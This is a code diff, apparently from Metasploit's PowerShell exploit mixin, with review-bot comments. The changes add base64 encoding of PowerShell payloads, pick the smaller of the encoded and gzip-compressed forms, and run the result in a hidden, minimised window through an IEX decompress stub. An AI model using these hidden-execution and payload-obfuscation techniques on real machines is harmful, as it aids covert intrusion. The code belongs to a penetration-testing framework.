Choose smallest smallest
parent
9aca98a9d4
commit
5add142789
|
@ -61,6 +61,20 @@ module Exploit::Powershell
|
|||
return new_subs
|
||||
end
|
||||
|
||||
#
|
||||
# Return an encoded powershell script
|
||||
# Will invoke PSH modifiers as enabled
|
||||
#
|
||||
def encode_script(script_in, eof = nil)
|
||||
# Build script object
|
||||
psh = PshScript.new(script_in)
|
||||
# Invoke enabled modifiers
|
||||
datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
|
||||
mod_method = k.split('::').last.intern
|
||||
psh.send(mod_method)
|
||||
end
|
||||
return psh.encode_code(eof)
|
||||
end
|
||||
#
|
||||
# Return a gzip compressed powershell script
|
||||
# Will invoke PSH modifiers as enabled
|
||||
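Review bot: `psh.send(mod_method)` dispatches a method name derived from whichever datastore keys match `/^PSH::(strip|sub)/`, and `send` ignores visibility, so any key carrying that prefix (not only the intended strip/sub modifiers) can reach a private method on PshScript; prefer `psh.public_send(mod_method)` guarded by an explicit allowlist of modifier names. The loop also uses `map` purely for its side effect and `and` for boolean logic, where `each` and `&&` say what is meant, and `\A` would anchor the whole key while `^` only anchors a line. `v == 'true'` assumes the option is stored as a string; if the datastore holds a boolean the modifiers are silently never applied, which is worth confirming against the option definitions, which are outside this hunk.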
|
@ -80,7 +94,7 @@ module Exploit::Powershell
|
|||
# Runs powershell in hidden window raising interactive proc msg
|
||||
#
|
||||
def run_hidden_psh(ps_code,ps_bin='powershell.exe')
|
||||
ps_args = "-w hidden -nop -e #{ compress_script(ps_code) }"
|
||||
ps_args = "-w hidden -nop -e #{ps_code}"
|
||||
|
||||
ps_wrapper = <<EOS
|
||||
$si=New-Object System.Diagnostics.ProcessStartInfo
|
||||
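Review bot: With `compress_script` removed from the `-e` argument, `ps_code` must now arrive already in `-e` form (the base64 that encode_script/compress_script produce), but neither the parameter name nor the comment above the def records that contract, so a caller passing raw PowerShell text gets a silently broken command line. Add above the def: `# ps_code: script already base64-encoded for -e (see encode_script / compress_script)`. run_hidden_psh's body continues past the hunk into the heredoc.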
|
@ -116,10 +130,22 @@ EOS
|
|||
end
|
||||
# Determine appropriate architecture, manual method reduces script size
|
||||
ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
|
||||
|
||||
|
||||
compressed = compress_script(psh_payload)
|
||||
encoded = encode_script(psh_payload)
|
||||
|
||||
if (encoded.length <= compressed.length)
|
||||
smallest_payload = encoded
|
||||
else
|
||||
smallest_payload = compressed
|
||||
end
|
||||
|
||||
# Wrap in hidden runtime
|
||||
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
||||
final_payload = run_hidden_psh(smallest_payload,ps_bin)
|
||||
|
||||
# Convert to base64 for -encodedcommand execution
|
||||
command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{psh_payload}\r\n"
|
||||
command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{final_payload}\r\n"
|
||||
end
|
||||
|
||||
|
||||
|
|
|
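Review bot: The `if (encoded.length <= compressed.length) … end` block is a five-line way of writing `smallest_payload = [encoded, compressed].min_by(&:length)`, which keeps the same tie-break in favour of `encoded` because `min_by` returns the first minimum. The comparison is only meaningful if both candidates are in the same wire form: encode_script returns base64 (its body is in the first hunk), but compress_script's return form is not visible here, so confirm it is also `-e`-ready base64 rather than the raw `$stream = …` expression built in the last hunk, otherwise the compressed branch hands `-e` non-base64 text. The enclosing method starts outside this hunk, and the `# Convert to base64 for -encodedcommand execution` comment now sits above a `-c` invocation, so it no longer describes the line beneath it.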
@ -28,7 +28,18 @@ module Powershell
|
|||
end
|
||||
return numbered
|
||||
end
|
||||
#
|
||||
# Return a Base64 encoded powershell code
|
||||
#
|
||||
def encode_code(eof = nil)
|
||||
# Convert expression to unicode
|
||||
unicode_expression = Rex::Text.to_unicode(code)
|
||||
|
||||
# Base64 encode the unicode expression
|
||||
@code = Rex::Text.encode_base64(unicode_expression)
|
||||
|
||||
return code
|
||||
end
|
||||
#
|
||||
# Return a zlib compressed powershell code
|
||||
#
|
||||
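Review bot: `encode_code(eof = nil)` accepts `eof` but never reads it anywhere in its body (the whole method lies inside this hunk), so the `eof` that encode_script forwards in the first hunk is silently dropped; either use it or remove the parameter from both methods. The method also overwrites `@code` with its base64 form before returning it, so calling it twice double-encodes the script; unless a later step depends on `@code` holding the encoded text, returning `Rex::Text.encode_base64(Rex::Text.to_unicode(code))` without the assignment avoids that, and if the assignment is intentional say so: `# NOTE: destructive — @code is replaced by its base64 form`.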
|
@ -44,7 +55,7 @@ module Powershell
|
|||
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
||||
psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
|
||||
psh_expression << "$(IEX $(New-Object IO.StreamReader("
|
||||
psh_expression << "$(New-Object IO.Compression.GzipStream("
|
||||
psh_expression << "$stream,"
|
||||
psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
|
|